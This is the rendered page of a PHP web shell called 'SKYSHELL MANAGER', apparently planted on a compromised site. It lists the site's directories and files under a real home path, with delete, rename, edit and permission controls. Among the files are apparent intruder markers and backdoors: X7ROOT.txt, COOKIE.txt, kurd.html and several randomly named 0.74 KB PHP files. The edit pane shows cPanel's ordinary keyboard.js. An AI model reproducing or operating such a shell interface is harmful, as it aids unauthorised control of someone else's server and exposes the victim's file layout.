📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: keyboard.js
/* # Copyright(c) 2020 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ (function() { // check to be sure the CPANEL global object already exists if (typeof CPANEL == "undefined" || !CPANEL) { alert("You must include the CPANEL global object before including keyboard.js!"); } else { var _is_old_ie = YAHOO.env.ua.ie && (YAHOO.env.ua.ie < 9); /** This only works with keypress listeners since it works on character codes, not key codes. Key codes pertain to the *key* pressed, while character codes pertain to the character that that key press produces. Browsers confuse the two in the keyCode and charCode properties. These methods are not foolproof; particular problems: * The "alpha" logic only applies to English/US-ASCII. Other languages' keyboards will not work correctly, and non-Latin alphabets will be completely broken. * Mouse pasting will circumvent these methods. * Some methods break keyboard pasting in some browsers (e.g., FF 13). In light of the above, use this code with caution. @module keyboard */ /** The urls class URLs for AJAX calls. @class keyboard @namespace CPANEL @extends CPANEL */ CPANEL.keyboard = { NUMERIC: /[0-9]/, LOWER_CASE_ALPHA: /[a-z]/, UPPER_CASE_ALPHA: /[A-Z]/, ALPHA: /[a-zA-Z]/, ALPHA_NUMERIC: /[a-zA-Z0-9]/, /** Processes the keyboard input to ignore keys outside the range. @name _onKeyPressAcceptValues @private @param [EventObject] e - event object passed by the framework. @param [RegEX] charReg - single character matching expression */ _onKeyPressAcceptValues: function(e, charReg) { if (!charReg) { return true; } // We need to reject keypress events that come from arrow keys etc. // We detect this in Firefox and Opera by checking for !charCode; // no other browser seems to fire keypress in those instances. // // We also need to ignore IE <8 since it only reports keyCode // for keypress in any circumstance, though it never fires keypress // on arrow keys. if (!_is_old_ie && !e.charCode) { return true; } var charCode = EVENT.getCharCode(e); // Test to see if this character key is allowed var keyChar = String.fromCharCode(charCode); return charReg.test(keyChar); }, /** Tests if a keypress was the return key @name isReturnKey @param [EventObject] e - event object passed by the framework. */ isReturnKey: function(e) { return EVENT.getCharCode(e) == 13; }, /** Allows only numeric keys to be processed. NOTE: This BREAKS copy/pasting with the keyboard in Firefox 13. @name allowNumericKey @param [EventObject] e - event object passed by the framework. */ allowNumericKey: function(e) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, CPANEL.keyboard.NUMERIC); if (!ok) { EVENT.preventDefault(e); } return ok; }, /** Allows only lower-case alpha (ASCII-English) keys to be processed. @name allowLowerCaseAlphaKey @param [EventObject] e - event object passed by the framework. */ allowLowerCaseAlphaKey: function(e) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, CPANEL.keyboard.LOWER_CASE_ALPHA); if (!ok) { EVENT.preventDefault(e); } return ok; }, /** Allows only upper-case alpha (ASCII-English) keys to be processed. NOTE: This BREAKS copy/pasting with the keyboard in Firefox 13. @name allowUpperCaseAlphaKey @param [EventObject] e - event object passed by the framework. */ allowUpperCaseAlphaKey: function(e) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, CPANEL.keyboard.UPPER_CASE_ALPHA); if (!ok) { EVENT.preventDefault(e); } return ok; }, /** Allows only alpha (ASCII-English) keys to be processed. @name allowAlphaKey @param [EventObject] e - event object passed by the framework. */ allowAlphaKey: function(e) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, CPANEL.keyboard.ALPHA); if (!ok) { EVENT.preventDefault(e); } return ok; }, /** Allows only alpha (ASCII-English) and numeric keys to be processed. @name allowAlphaNumericKey @param [EventObject] e - event object passed by the framework. */ allowAlphaNumericKey: function(e) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, CPANEL.keyboard.ALPHA_NUMERIC); if (!ok) { EVENT.preventDefault(e); } return ok; }, /** Allows only keys that match the single character matching rule to be processed. Matching rules should only contain match patterns for single unicode characters. @name allowAlphaNumericKey @param [EventObject] e - event object passed by the framework. @parem [Regex] charReg - pattern matching rules for any single character. */ allowPatternKey: function(e, charReg) { var ok = CPANEL.keyboard._onKeyPressAcceptValues(e, charReg); if (!ok) { EVENT.preventDefault(e); } return ok; } }; } }());
Save